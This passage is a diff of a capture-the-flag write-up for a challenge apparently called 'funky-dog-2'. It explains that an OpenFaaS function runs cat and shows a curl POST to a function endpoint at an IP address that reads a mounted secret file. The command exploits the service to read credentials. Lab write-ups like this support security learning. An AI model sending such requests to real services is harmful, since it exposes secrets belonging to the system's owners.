ItemizeNTNU/kid20-challenges/misc/funky-dog-2/writeup.md

 CMD [ "/usr/bin/fwatchdog"]
 ```

-The function is running the Linux cat command!
+The function is running the Unix cat command!
 Now we can try to cat the contents of the "secret-password" mounted in the container.

 ```bash
 ❯ curl -X POST http://129.241.209.104:8080/function/dog -d '/var/openfaas/secrets/secret-password'